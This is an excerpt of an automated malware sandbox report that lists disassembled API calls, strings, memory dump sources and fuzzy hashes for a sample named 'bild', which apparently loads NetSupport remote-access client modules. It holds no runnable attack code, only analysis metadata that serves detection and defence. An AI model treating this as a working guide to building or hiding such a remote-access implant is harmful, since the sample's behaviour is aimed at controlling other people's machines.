                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DriveType
                                                                                          • String ID: ?:\
                                                                                          • API String ID: 338552980-2533537817
                                                                                          • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                          • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                          • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                          • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                          APIs
                                                                                            • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                          • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                            • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                          Strings
                                                                                          • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpenwvsprintf
                                                                                          • String ID: Error %d Opening regkey %s
                                                                                          • API String ID: 1772833024-3994271378
                                                                                          • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                          • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                          • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                          • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                          APIs
                                                                                          • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                            • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                          Strings
                                                                                          • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Closewvsprintf
                                                                                          • String ID: Error %d closing regkey %x
                                                                                          • API String ID: 843752472-892920262
                                                                                          • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                          • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                          • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                          • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,013FB8D8,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                            • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: HandleLibraryLoadModule
                                                                                          • String ID: NSMTRACE
                                                                                          • API String ID: 4133054770-4175627554
                                                                                          • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                          • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                          • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                          • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: psapi.dll
                                                                                          • API String ID: 1029625771-80456845
                                                                                          • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                          • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                          • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                          • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: psapi.dll
                                                                                          • API String ID: 1029625771-80456845
                                                                                          • Opcode ID: da9ba6b9108b5a1da7a69163ff45c9fd3a871f795f47dd764ef31cb7843d73a1
                                                                                          • Instruction ID: 346e92fae3619d098be94a854bc999274014aaf96139f4514e4f6619d58bc06a
                                                                                          • Opcode Fuzzy Hash: da9ba6b9108b5a1da7a69163ff45c9fd3a871f795f47dd764ef31cb7843d73a1
                                                                                          • Instruction Fuzzy Hash: 11E001B1A01B108F87B0CF3EA544642BEF0BB086523118E2EA09EC3A00E730A5848F84
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: nslsp.dll
                                                                                          • API String ID: 1029625771-3933918195
                                                                                          • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                          • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                          • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                          • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 11074E1F
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary_memset
                                                                                          • String ID:
                                                                                          • API String ID: 1654520187-0
                                                                                          • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                          • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                          • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                          • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 110883EF
                                                                                          • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection_memset
                                                                                          • String ID:
                                                                                          • API String ID: 453477542-0
                                                                                          • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                          • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                          • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                          • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                          • ExtractIconExA.SHELL32(?,00000000,000304B1,000204A5,00000001), ref: 11144498
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExtractFileIconModuleName
                                                                                          • String ID:
                                                                                          • API String ID: 3911389742-0
                                                                                          • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                          • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                          • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                          • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                          APIs
                                                                                            • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                          • __lock_file.LIBCMT ref: 11163DFE
                                                                                            • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                          • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                          • String ID:
                                                                                          • API String ID: 2800547568-0
                                                                                          • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                          • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                          • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                          • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 6C5E6C26
                                                                                          • Sleep.KERNEL32(00000064), ref: 6C5E6C5B
                                                                                            • Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTick$Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 4250438611-0
                                                                                          • Opcode ID: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
                                                                                          • Instruction ID: 5c06991088173c470f759b7a2080c7f30e7aae5c20f2013a738cd78e48c7af01
                                                                                          • Opcode Fuzzy Hash: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
                                                                                          • Instruction Fuzzy Hash: C6F03071700308CECF14EA6A9D9635CB6B1DBA639AF120037C616D6E90DF745884C749
                                                                                          APIs
                                                                                          • WSACancelBlockingCall.WSOCK32 ref: 6C5D63A9
                                                                                          • Sleep.KERNEL32(00000032), ref: 6C5D63B3
